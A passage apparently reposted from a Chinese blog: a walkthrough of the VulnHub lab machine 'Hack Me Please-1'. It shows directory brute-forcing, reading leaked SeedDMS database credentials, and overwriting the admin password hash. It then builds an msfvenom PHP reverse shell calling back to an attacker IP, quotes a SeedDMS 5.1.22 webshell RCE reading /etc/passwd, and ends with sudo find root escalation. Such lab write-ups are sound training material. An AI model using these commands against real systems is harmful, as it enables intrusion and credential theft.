『vulnhub系列』Hack Me Please-1
『vulnhub系列』Hack Me Please-1下载地址:
https://www.vulnhub.com/entry/hack-me-please-1,731/信息搜集:
使用nmap举行探测存活主机,发现主机开启了80端口和3306端口
nmap 192.168.0.*https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531170949065-1331761442.png
访问80端口的web服务
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531170957998-1458689283.png
使用dirsearch扫描目次,但是并没有可以访问的页面
dirsearch -u "http://192.168.0.132/"https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171004745-582300792.png
在main.js发现提示,有一个目次/seeddms51x/seeddms-5.1.22/
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171010874-95244414.png
访问一下是一个登录页面
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171017777-974959504.png
现在我们扫描这个目次
dirsearch -u "http://192.168.0.132/seeddms51x/seeddms-5.1.22/"https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171025230-35721361.png
访问/install页面
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171032098-2105409954.png
发现install不了
http://192.168.0.132/seeddms51x/seeddms-5.1.22/install/install.phphttps://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171040427-1604627891.png
说是要在conf目次下创建ENABLE_INSTALL_TOOL ,但是我们好像并不知道这个conf目次在哪里
可以确定当前seeddms51x/seeddms-5.1.22/ 目次下没有。现在我们向前每一级文件都爆破一下。
dirsearch -u "http://192.168.0.132/seeddms51x/"我们现在几乎可以确定conf就在/seeddms51x/这个目次文件下了
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171051309-1039900307.png
然后我们继续访问conf/ENABLE_INSTALL_TOOL和conf,发现都无法访问
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171100523-610497509.png
继续爆破一下吧,终于发现了settings.xml
dirsearch -u "http://192.168.0.132/seeddms51x/conf"https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171108319-297817024.png
访问一下,我们找到了数据库的用户名和暗码都为:seeddms
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171116846-550996747.png
我们登录mysql
mysql -h 192.168.0.132 -u seeddms -phttps://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171124363-175505123.png
show database; #查看数据库https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171130966-341426503.png
发现users表
use seeddms; #使用seeddms数据库
show tables; #查看表https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171138284-641270319.png
查看users表的内容发现用户名和暗码
+-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+
select * from users; #查看users所有内容https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171146156-760532295.png
使用ID和暗码登录
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171152519-54024679.png
登录失败,还有个表是tblUsers,我们查看一下,里面有一个admin和一个md5加密的暗码
select * from tblUsers;https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171159393-1913326732.png
我们可以覆盖一下,首先使用python天生一个md5值21232f297a57a5a743894a0e4a801fc3
python3 -c 'import hashlib;print(hashlib.md5("admin".encode()).hexdigest())'https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171210312-1229670263.png
修改数据库条目,修改乐成
update tblUsers set pwd='21232f297a57a5a743894a0e4a801fc3' where login='admin';https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171217220-1383285093.png
使用我们修改后的暗码admin和用户名admin登录,登陆乐成
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171223029-1926017139.png
毛病利用:
我们发现添加文件选项是可以上传文件的,我们上传一个msfvenom天生的反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.129 lport=4444 -o re_shell.phphttps://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171231776-1517231355.png
我们此时搜一下seeddms的毛病
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171237373-477419192.png
看到一个长途命令实行,看一下怎样实现
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
......
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.步骤1,2:就是登录,然后上传一个文档,我们已经上传完成了例子用的是一个webshell,我们上传的是反弹shell,我们需要找到上传文件的位置
步骤3:查看文档的id,我们通过刚刚上传的反弹php序号为12
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171253078-360657623.png
步骤4:访问/data/1048576/"document_id"/1.php 页面,在那之前先开启msf的监听,然后访问1.php
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171259714-1958759008.png
反弹乐成
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171307138-1249200511.png
提升权限:
我们查看/home页面发现存在用户saket
我们之前有在数据库中发现过saket,他的暗码是Saket@#$1337我们登陆试试,登录乐成
su sakethttps://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171314942-1956433863.png
使用sudo -l 查看此用户可以以root权限实行的命令,发现是(ALL : ALL) ALL
https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171321564-73412272.png
那就自由发挥吧,这里使用find提权,乐成
sudo find /home -exec /bin/bash \;https://img2024.cnblogs.com/blog/2131225/202405/2131225-20240531171330279-1425062678.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]